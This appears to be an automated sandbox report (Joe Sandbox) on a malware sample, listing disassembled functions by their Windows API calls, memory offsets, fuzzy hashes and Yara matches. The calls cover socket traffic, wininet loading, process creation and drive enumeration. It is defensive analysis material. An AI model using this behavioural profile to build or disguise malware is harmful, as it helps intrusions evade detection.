                                                                                                  Similarity
                                                                                                  • API ID: _free_strlen$____lc_codepage_func__amsg_exit__getenv_helper_nolock__getptd__invoke_watson__lock__malloc_crt__mtinitlocknum_strcpy_s
                                                                                                  • String ID:
                                                                                                  • API String ID: 2128035972-0
                                                                                                  • Opcode ID: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
                                                                                                  • Instruction ID: 4433998923b967bdb7d3ac224d7520d7399778e49f3e895a63a568da075b79cc
                                                                                                  • Opcode Fuzzy Hash: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
                                                                                                  • Instruction Fuzzy Hash: 199190F5D0425A9FDF21EFAACC819EDBBB9FF49210F18406AE550AB250D7358952CF20
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,02D0398D,?,00000000,000000FF,00000000), ref: 02D03E05
                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,02D0398D,?,00000000,000000FF,00000000), ref: 02D03E50
                                                                                                  • send.WS2_32(?,000000FF,00000000,00000000), ref: 02D03E6E
                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 02D03E81
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 02D03E94
                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,02D0398D,?,00000000,000000FF,00000000), ref: 02D03EBC
                                                                                                  • WSAGetLastError.WS2_32(?,?,02D0398D,?,00000000,000000FF,00000000), ref: 02D03EC7
                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,02D0398D,?,00000000,000000FF,00000000), ref: 02D03EDB
                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 02D03F14
                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 02D03F51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1701177279-0
                                                                                                  • Opcode ID: 287b2bbc65bf0e6177d361b6ad58950ce21137de55a06bb817c37a29dabbae6a
                                                                                                  • Instruction ID: c2e325daacdbf53db90b838ba1475e95f0613bf2a10b7387482687871b8b1e4f
                                                                                                  • Opcode Fuzzy Hash: 287b2bbc65bf0e6177d361b6ad58950ce21137de55a06bb817c37a29dabbae6a
                                                                                                  • Instruction Fuzzy Hash: 7141F5715046019FC7648F78D9C8BA7B7F8AB49304F458AADE85ACB390D731E845CB60
                                                                                                  APIs
                                                                                                  • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02D04F63
                                                                                                  • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02D04F78
                                                                                                  • WSASetLastError.WS2_32(00002746), ref: 02D04F8A
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 02D04F91
                                                                                                  • timeGetTime.WINMM ref: 02D04FBF
                                                                                                  • timeGetTime.WINMM ref: 02D04FE7
                                                                                                  • SetEvent.KERNEL32(?), ref: 02D05025
                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D05031
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 02D05038
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 02D0504B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                  • String ID:
                                                                                                  • API String ID: 1979691958-0
                                                                                                  • Opcode ID: 82841c400f2053694ec0a4f2e9818c0db3b21d2ff48c31681c890e8391f8092c
                                                                                                  • Instruction ID: f9c61c30e6245ad7ac27219eb27136376b38a9f97f3b668a286682f2e597299e
                                                                                                  • Opcode Fuzzy Hash: 82841c400f2053694ec0a4f2e9818c0db3b21d2ff48c31681c890e8391f8092c
                                                                                                  • Instruction Fuzzy Hash: 6341E331A402008BC7309F68D988F6ABBE6FF48314F018959E98AC77E1E335EC54CB40
                                                                                                  APIs
                                                                                                  • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 00974F43
                                                                                                  • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 00974F58
                                                                                                  • WSASetLastError.WS2_32(00002746), ref: 00974F6A
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 00974F71
                                                                                                  • timeGetTime.WINMM ref: 00974F9F
                                                                                                  • timeGetTime.WINMM ref: 00974FC7
                                                                                                  • SetEvent.KERNEL32(?), ref: 00975005
                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 00975011
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 00975018
                                                                                                  • LeaveCriticalSection.KERNEL32(000002FF), ref: 0097502B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                  • String ID:
                                                                                                  • API String ID: 1979691958-0
                                                                                                  • Opcode ID: 418c7f6623d9ab7a32092d9b51cb10cd27355b97d52f8ea64e355d6d2f897b3a
                                                                                                  • Instruction ID: dcf66b6b58c709fbe2a66862f44f01d2d6f88855ec7a9772d31284a95aabe956
                                                                                                  • Opcode Fuzzy Hash: 418c7f6623d9ab7a32092d9b51cb10cd27355b97d52f8ea64e355d6d2f897b3a
                                                                                                  • Instruction Fuzzy Hash: 0E410032604A009FD720DF69D988B6AB7E9FF48310F158599E88ECB352E775E844CB81
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 02D0C2AE
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 02D0C2CC
                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02D0C309
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D0C314
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D0C321
                                                                                                  • wsprintfW.USER32 ref: 02D0C345
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                                  • String ID: %s %s
                                                                                                  • API String ID: 1326869720-2939940506
                                                                                                  • Opcode ID: 38ab7c1ef4b9d8123fa412a5ca342cc86060a920dc77085160d2eee4f53fb6fb
                                                                                                  • Instruction ID: 6efcd0301c1111316b0bef5c2cf8b7e1120ce6f85a34b43f331dbb227f733d74
                                                                                                  • Opcode Fuzzy Hash: 38ab7c1ef4b9d8123fa412a5ca342cc86060a920dc77085160d2eee4f53fb6fb
                                                                                                  • Instruction Fuzzy Hash: 3A31D532A502186BDB34DB64DC89FEF7378FB54311F40469ABA46A62C0DB305E48CFA4
                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D0C98D
                                                                                                  • _wcsrchr.LIBCMT ref: 02D0C9C7
                                                                                                    • Part of subcall function 02D07C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 02D07CC3
                                                                                                    • Part of subcall function 02D07C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 02D07CD7
                                                                                                    • Part of subcall function 02D07C80: FreeLibrary.KERNEL32(00000000), ref: 02D07CF7
                                                                                                  • GetFileAttributesW.KERNEL32(-00000002), ref: 02D0C9E6
                                                                                                  • GetLastError.KERNEL32 ref: 02D0C9F1
                                                                                                  • _memset.LIBCMT ref: 02D0CA04
                                                                                                  • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 02D0CA31
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                                  • String ID: D$WinSta0\Default
                                                                                                  • API String ID: 174883095-1101385590
                                                                                                  • Opcode ID: c9c60bc4db5109d555a470ca776a722498d07bcee4b19498663d4550f319b86a
                                                                                                  • Instruction ID: 0675967e2c46afb4d49c093d2e956d828239db6d9f2d85b7d25031a405572a12
                                                                                                  • Opcode Fuzzy Hash: c9c60bc4db5109d555a470ca776a722498d07bcee4b19498663d4550f319b86a
                                                                                                  • Instruction Fuzzy Hash: 8A112BB290010437D720E6A5AC8AFAFB76DDF94710F040126FE059A3D0EB359D09C6F1
                                                                                                  APIs
                                                                                                  • lstrcmpiW.KERNEL32(?,A:\), ref: 02D08166
                                                                                                  • lstrcmpiW.KERNEL32(?,B:\), ref: 02D08176
                                                                                                  • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 02D081A6
                                                                                                  • lstrlenW.KERNEL32(?), ref: 02D081B7
                                                                                                  • __wcsnicmp.LIBCMT ref: 02D081CE
                                                                                                  • lstrcpyW.KERNEL32(00000AD4,?), ref: 02D08204
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 02D08228
                                                                                                  • lstrcatW.KERNEL32(?,00000000), ref: 02D08233
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                                  • String ID: A:\$B:\
                                                                                                  • API String ID: 4249875308-1009255891
                                                                                                  • Opcode ID: 6501c81d47d97fcb9e13dcb6f80e32bf17d48db7f1c46b54ffbb0f12bfe5cca4
                                                                                                  • Instruction ID: 5dbf9bd1804ac554d6c78854c3c027d6c88f4abcc194eb897272cf696089ae29
                                                                                                  • Opcode Fuzzy Hash: 6501c81d47d97fcb9e13dcb6f80e32bf17d48db7f1c46b54ffbb0f12bfe5cca4
                                                                                                  • Instruction Fuzzy Hash: 54114271E412289ADB349F60DD84BAE7379EF54314F014498EE0AA3240E7749E19CB95
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strcat_s$_memset$__localtime64__time64__wcsnicmp_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 3592133475-0
                                                                                                  • Opcode ID: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
                                                                                                  • Instruction ID: c37b20005270fd4bea5008af3d5dc5d296092ff58590bc701196d04a0df6bbac
                                                                                                  • Opcode Fuzzy Hash: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
                                                                                                  • Instruction Fuzzy Hash: 7DF1B6B9940224AFD724DBA4CC85FDA73B9EF48300F404558E70EE7281EB75AA89CF55
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strcat_s$_memset$__localtime64__time64__wcsnicmp_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 3592133475-0
                                                                                                  • Opcode ID: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
                                                                                                  • Instruction ID: e5d59ba111de203788649fd9247d55e6837fc385e2bb812d9f69244302431678
                                                                                                  • Opcode Fuzzy Hash: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
                                                                                                  • Instruction Fuzzy Hash: 7DF1A4F5900714ABD724DB64CC85FEBB3B8EF88700F408569E70AA7281EB71AA45CF55
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_strlen$____lc_codepage_func__getenv_helper_nolock__invoke_watson__malloc_crt_strcpy_s
                                                                                                  • String ID:
                                                                                                  • API String ID: 2056778627-0
                                                                                                  • Opcode ID: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
                                                                                                  • Instruction ID: 805996d9ff2f16cd21a42441561744c97fbd46774e0f8a3114a668feb67a55c1
                                                                                                  • Opcode Fuzzy Hash: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
                                                                                                  • Instruction Fuzzy Hash: 7061D87DC01259AFEB27EF68CCC19AE77FAEF49314B644029E504EB160E73899418F91
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_strlen$____lc_codepage_func__getenv_helper_nolock__invoke_watson__malloc_crt_strcpy_s
                                                                                                  • String ID:
                                                                                                  • API String ID: 2056778627-0
                                                                                                  • Opcode ID: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
                                                                                                  • Instruction ID: 961060546ea7c9bc715d3d39281963bf904a476d4bf0ed35a625328c70c16a54
                                                                                                  • Opcode Fuzzy Hash: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
                                                                                                  • Instruction Fuzzy Hash: 4361A3F2D05356AFEF15EF66CC818EEB7B9EB45310B28406AE540EF160E73598418F20
                                                                                                  APIs
                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,7A8163DF,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E,00000000), ref: 02D09773
                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(02D0E1AE,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D09812
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D09850
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D09875
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D0989A
                                                                                                    • Part of subcall function 02D01280: __CxxThrowException@8.LIBCMT ref: 02D01290
                                                                                                    • Part of subcall function 02D01280: DeleteCriticalSection.KERNEL32(00000000,02D0D3E6,02D26624,?,?,02D0D3E6,?,?,?,?,02D25A40,00000000), ref: 02D012A1
                                                                                                    • Part of subcall function 02D0CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(02D0E076,00000000,7A8163DF,02D0E04E,76F92F60,00000000,?,02D0E226,02D2110B,000000FF,?,02D0994A,02D0E226), ref: 02D0CE67
                                                                                                    • Part of subcall function 02D0CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(02D0E08E,00000000,?,02D0E226,02D2110B,000000FF,?,02D0994A,02D0E226,?,?,?,00000000,02D2125B,000000FF), ref: 02D0CE83
                                                                                                  • InterlockedExchange.KERNEL32(02D0E066,00000000), ref: 02D099A0
                                                                                                  • timeGetTime.WINMM(?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D099A6
                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D099B4
                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,02D2125B,000000FF,?,02D0E04E), ref: 02D099BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                  • String ID:
                                                                                                  • API String ID: 1400036169-0
                                                                                                  • Opcode ID: a54763b38956bbd1a86b77770a69aeeb1627d6dc916fda42f7d9f06f1182c8d4
                                                                                                  • Instruction ID: c8cad6006d6cee5462a817f4df3862f5e34ca1e8d4238b8a2e1e090d6e9222f9
                                                                                                  • Opcode Fuzzy Hash: a54763b38956bbd1a86b77770a69aeeb1627d6dc916fda42f7d9f06f1182c8d4
                                                                                                  • Instruction Fuzzy Hash: 8881D6B0A01A46BFD354DF7A89C479AFBA8FB08304F50862EE12C97740D775A964CF90
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D03660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02D03667
                                                                                                    • Part of subcall function 02D03660: _free.LIBCMT ref: 02D0369C
                                                                                                    • Part of subcall function 02D03660: _malloc.LIBCMT ref: 02D036D7
                                                                                                    • Part of subcall function 02D03660: _memset.LIBCMT ref: 02D036E5
                                                                                                  • InterlockedIncrement.KERNEL32(02D31F0C), ref: 02D03565
                                                                                                  • InterlockedIncrement.KERNEL32(02D31F0C), ref: 02D03573
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 02D0359A
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02D035B3
                                                                                                  • ResetEvent.KERNEL32(?,?,?,02D31F0C), ref: 02D035EE
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 02D03621
                                                                                                  • GetLastError.KERNEL32 ref: 02D03639
                                                                                                    • Part of subcall function 02D03F60: GetCurrentThreadId.KERNEL32 ref: 02D03F65
                                                                                                    • Part of subcall function 02D03F60: send.WS2_32(?,02D249C0,00000010,00000000), ref: 02D03FC6
                                                                                                    • Part of subcall function 02D03F60: SetEvent.KERNEL32(?), ref: 02D03FE9
                                                                                                    • Part of subcall function 02D03F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02D03FF5
                                                                                                    • Part of subcall function 02D03F60: WSACloseEvent.WS2_32(?), ref: 02D04003
                                                                                                    • Part of subcall function 02D03F60: shutdown.WS2_32(?,00000001), ref: 02D0401B
                                                                                                    • Part of subcall function 02D03F60: closesocket.WS2_32(?), ref: 02D04025
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 02D03649
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 127459856-0
                                                                                                  • Opcode ID: 197041681b85303b92153bda70f58ef54def5a077744186c9bd6499473d79fac
                                                                                                  • Instruction ID: 1687e1784ada1f1f8301d213e0b8fabd2944844b98797376fae2ac834215b9c1
                                                                                                  • Opcode Fuzzy Hash: 197041681b85303b92153bda70f58ef54def5a077744186c9bd6499473d79fac
                                                                                                  • Instruction Fuzzy Hash: 68418EB16407049FD3A0DF69DC85B6AB7E4FB48711F50486EEA46D3790D7B1E8048B50
                                                                                                  APIs
                                                                                                    • Part of subcall function 00973660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00973667
                                                                                                    • Part of subcall function 00973660: _free.LIBCMT ref: 0097369C
                                                                                                    • Part of subcall function 00973660: _malloc.LIBCMT ref: 009736D7
                                                                                                    • Part of subcall function 00973660: _memset.LIBCMT ref: 009736E5
                                                                                                  • InterlockedIncrement.KERNEL32(0098D990), ref: 00973565
                                                                                                  • InterlockedIncrement.KERNEL32(0098D990), ref: 00973573
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0097359A
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 009735B3
                                                                                                  • ResetEvent.KERNEL32(?,?,?,0098D990), ref: 009735EE
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00973621
                                                                                                  • GetLastError.KERNEL32 ref: 00973639
                                                                                                    • Part of subcall function 00973F60: GetCurrentThreadId.KERNEL32 ref: 00973F65
                                                                                                    • Part of subcall function 00973F60: send.WS2_32(?,00987440,00000010,00000000), ref: 00973FC6
                                                                                                    • Part of subcall function 00973F60: SetEvent.KERNEL32(?), ref: 00973FE9
                                                                                                    • Part of subcall function 00973F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00973FF5
                                                                                                    • Part of subcall function 00973F60: WSACloseEvent.WS2_32(?), ref: 00974003
                                                                                                    • Part of subcall function 00973F60: shutdown.WS2_32(?,00000001), ref: 0097401B
                                                                                                    • Part of subcall function 00973F60: closesocket.WS2_32(?), ref: 00974025
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00973649
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                  • String ID:
                                                                                                  • API String ID: 127459856-0
                                                                                                  • Opcode ID: e0d7c3e981270277acad66a1495f617e27647d05f76902b02c52a6b101a985a6
                                                                                                  • Instruction ID: 29295673adf16032e235de15c78e1b44f1a856b4b145858cd0d8da2b6c458c01
                                                                                                  • Opcode Fuzzy Hash: e0d7c3e981270277acad66a1495f617e27647d05f76902b02c52a6b101a985a6
                                                                                                  • Instruction Fuzzy Hash: E641A4B2604704AFD360EF69DC81B5AB7E8FB88700F50842EF64AD7780D7B5E9049B51
                                                                                                  APIs
                                                                                                  • ResetEvent.KERNEL32(?), ref: 02D04443
                                                                                                  • ResetEvent.KERNEL32(?), ref: 02D0444C
                                                                                                  • timeGetTime.WINMM ref: 02D0444E
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02D0445D
                                                                                                  • WaitForSingleObject.KERNEL32(?,00001770), ref: 02D044AB
                                                                                                  • ResetEvent.KERNEL32(?), ref: 02D044C8
                                                                                                    • Part of subcall function 02D03F60: GetCurrentThreadId.KERNEL32 ref: 02D03F65
                                                                                                    • Part of subcall function 02D03F60: send.WS2_32(?,02D249C0,00000010,00000000), ref: 02D03FC6
                                                                                                    • Part of subcall function 02D03F60: SetEvent.KERNEL32(?), ref: 02D03FE9
                                                                                                    • Part of subcall function 02D03F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02D03FF5
                                                                                                    • Part of subcall function 02D03F60: WSACloseEvent.WS2_32(?), ref: 02D04003
                                                                                                    • Part of subcall function 02D03F60: shutdown.WS2_32(?,00000001), ref: 02D0401B
                                                                                                    • Part of subcall function 02D03F60: closesocket.WS2_32(?), ref: 02D04025
                                                                                                  • ResetEvent.KERNEL32(?), ref: 02D044DC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                  • String ID:
                                                                                                  • API String ID: 542259498-0
                                                                                                  • Opcode ID: 3bddb8f51be9d4765995deaf9294577770afd50b0de5a61c16adedf0f065cdeb
                                                                                                  • Instruction ID: 3afba703f727b9264329803ed621f4c9fbae40e55eb80b31e19e787de9a6361f
                                                                                                  • Opcode Fuzzy Hash: 3bddb8f51be9d4765995deaf9294577770afd50b0de5a61c16adedf0f065cdeb
                                                                                                  • Instruction Fuzzy Hash: 0B214F766407046BC330EB69DC88F97B3E8EF99710F104A1EF68AC7790D671E8148BA0
                                                                                                  APIs
                                                                                                  • ResetEvent.KERNEL32(?), ref: 00974443
                                                                                                  • ResetEvent.KERNEL32(?), ref: 0097444C
                                                                                                  • timeGetTime.WINMM ref: 0097444E
                                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0097445D
                                                                                                  • WaitForSingleObject.KERNEL32(?,00001770), ref: 009744AB
                                                                                                  • ResetEvent.KERNEL32(?), ref: 009744C8
                                                                                                    • Part of subcall function 00973F60: GetCurrentThreadId.KERNEL32 ref: 00973F65
                                                                                                    • Part of subcall function 00973F60: send.WS2_32(?,00987440,00000010,00000000), ref: 00973FC6
                                                                                                    • Part of subcall function 00973F60: SetEvent.KERNEL32(?), ref: 00973FE9
                                                                                                    • Part of subcall function 00973F60: InterlockedExchange.KERNEL32(?,00000000), ref: 00973FF5
                                                                                                    • Part of subcall function 00973F60: WSACloseEvent.WS2_32(?), ref: 00974003
                                                                                                    • Part of subcall function 00973F60: shutdown.WS2_32(?,00000001), ref: 0097401B
                                                                                                    • Part of subcall function 00973F60: closesocket.WS2_32(?), ref: 00974025
